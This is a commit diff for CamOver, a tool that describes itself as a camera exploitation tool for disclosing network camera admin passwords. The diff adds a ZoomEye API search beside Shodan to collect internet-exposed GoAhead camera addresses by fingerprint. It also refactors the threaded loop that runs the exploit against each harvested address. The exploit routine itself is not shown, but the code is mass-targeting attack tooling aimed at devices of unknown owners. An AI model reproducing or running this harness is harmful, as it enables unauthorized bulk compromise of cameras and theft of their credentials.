STRLCPY/CamOver

Update cli.py
Ivan Nikolsky committed with GitHub 3 years ago

17d729ff

1 parent 939d1804

Total 1 files

■ ■ ■ ■ ■ ■

camover/cli.py

		skipped 26 lines
27	27		import os
28	28		import argparse
29	29		import threading
	30	+	import requests
30	31
31	32		from shodan import Shodan
32	33		from time import sleep as thread_delay
		skipped 3 lines
36	37
37	38
38	39		class CamOverCLI(CamOver, Badges):
	40	+	threads = list()
39	41		thread_delay = 0.1
40	42
41	43		description = "CamOver is a camera exploitation tool that allows to disclosure network camera admin password."
		skipped 2 lines
44	46		parser.add_argument('-o', '--output', dest='output', help='Output result to file.')
45	47		parser.add_argument('-i', '--input', dest='input', help='Input file of addresses.')
46	48		parser.add_argument('-a', '--address', dest='address', help='Single address.')
47		-	parser.add_argument('--api', dest='api', help='Shodan API key for exploiting devices over Internet.')
	49	+	parser.add_argument('--shodan', dest='shodan', help='Shodan API key for exploiting devices over Internet.')
	50	+	parser.add_argument('--zoomeye', dest='zoomeye', help='ZoomEye API key for exploiting devices over Internet.')
	51	+	parser.add_argument('-p', '--pages', dest='pages', type=int, help='Number of pages you want to get from ZoomEye.')
48	52		args = parser.parse_args()
49	53
50	54		def thread(self, address):
		skipped 7 lines
58	62		with open(self.args.output, 'a') as f:
59	63		f.write(f"{result}\n")
60	64
61		-	def start(self):
	65	+	def crack(self, addresses):
62	66		line = "/-\\|"
63	67		counter = 0
64	68
65		-	if self.args.threads:
66		-	threads = list()
	69	+	for address in addresses:
	70	+	if counter >= len(line):
	71	+	counter = 0
	72	+	self.print_process(f"Exploiting... ({address}) {line[counter]}", end='')
	73	+
	74	+	if not self.args.threads:
	75	+	self.thread(address)
	76	+	else:
	77	+	thread_delay(self.thread_delay)
	78	+	thread = threading.Thread(target=self.thread, args=[address])
	79	+
	80	+	thread.start()
	81	+	self.threads.append(thread)
	82	+	counter += 1
	83	+
	84	+	def clean_up(self):
	85	+	line = "/-\\|"
	86	+	counter = 0
	87	+
	88	+	for thread in self.threads:
	89	+	if counter >= len(line):
	90	+	counter = 0
	91	+	self.print_process(f"Cleaning up... {line[counter]}", end='')
	92	+
	93	+	if thread.is_alive():
	94	+	thread.join()
	95	+	counter += 1
	96	+
	97	+	def start(self):
	98	+	if self.args.zoomeye:
	99	+	self.print_process("Authorizing ZoomEye by given API key...")
	100	+	try:
	101	+	zoomeye = 'https://api.zoomeye.org/host/search?query=GoAhead 5ccc069c403ebaf9f0171e9517f40e41&page='
	102	+	zoomeye_header = {
	103	+	'Authorization': f'JWT {self.zoomeye}'
	104	+	}
	105	+	addresses = list()
	106	+
	107	+	if self.args.pages:
	108	+	pages = int(self.args.pages)
	109	+	else:
	110	+	pages = 100
	111	+	pages, page = divmod(pages, 20)
	112	+	if page != 0:
	113	+	pages += 1
	114	+
	115	+	for page in range(1, pages + 1):
	116	+	results = requests.get(zoomeye + str(page), headers=zoomeye_header).json()
	117	+	if not len(results['matches']):
	118	+	self.print_error("Failed to authorize ZoomEye!")
	119	+	return
	120	+	for address in results['matches']:
	121	+	addresses.append(address['ip'] + ':' + str(address['portinfo']['port']))
	122	+	except Exception:
	123	+	self.print_error("Failed to authorize ZoomEye!")
	124	+	return
	125	+	self.crack(addresses)
67	126
68		-	if self.args.api:
	127	+	elif self.args.shodan:
69	128		self.print_process("Authorizing Shodan by given API key...")
70	129		try:
71		-	shodan = Shodan(self.args.api)
	130	+	shodan = Shodan(self.args.shodan)
72	131		results = shodan.search(query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41')
73	132		addresses = list()
74	133		for result in results['matches']:
		skipped 2 lines
77	136		self.print_error("Failed to authorize Shodan!")
78	137		return
79	138		self.print_success("Authorization successfully completed!")
80		-
81		-	for address in addresses:
82		-	if counter >= len(line):
83		-	counter = 0
84		-	self.print_process(f"Exploiting... ({address}) {line[counter]}")
85		-
86		-	if not self.args.threads:
87		-	self.thread(address)
88		-	else:
89		-	thread_delay(self.thread_delay)
90		-	thread = threading.Thread(target=self.thread, args=[address])
91		-
92		-	thread.start()
93		-	threads.append(thread)
94		-	counter += 1
	139	+	self.crack(addresses)
95	140
96	141		elif self.args.input:
97	142		if not os.path.exists(self.args.input):
		skipped 2 lines
100	145
101	146		with open(self.args.input, 'r') as f:
102	147		addresses = f.read().strip().split('\n')
103		-
104		-	for address in addresses:
105		-	if counter >= len(line):
106		-	counter = 0
107		-	self.print_process(f"Exploiting... ({address}) {line[counter]}", end='')
108		-
109		-	if not self.args.threads:
110		-	self.thread(address)
111		-	else:
112		-	thread_delay(self.thread_delay)
113		-	thread = threading.Thread(target=self.thread, args=[address])
114		-
115		-	thread.start()
116		-	threads.append(thread)
117		-	counter += 1
	148	+	self.crack(addresses)
118	149
119	150		elif self.args.address:
120	151		self.print_process(f"Exploiting {self.args.address}...")
121	152		self.thread(self.args.address)
	153	+
122	154		else:
123	155		self.parser.print_help()
124		-
125		-	if self.args.threads:
126		-	counter = 0
127		-
128		-	for thread in threads:
129		-	if counter >= len(line):
130		-	counter = 0
131		-	self.print_process(f"Cleaning up... {line[counter]}", end='')
	156	+	return
132	157
133		-	if thread.is_alive():
134		-	thread.join()
135		-	counter += 1
	158	+	self.clean_up()
136	159		self.print_empty(end='')
137	160
138	161		def main():
		skipped 6 lines

Update cli.py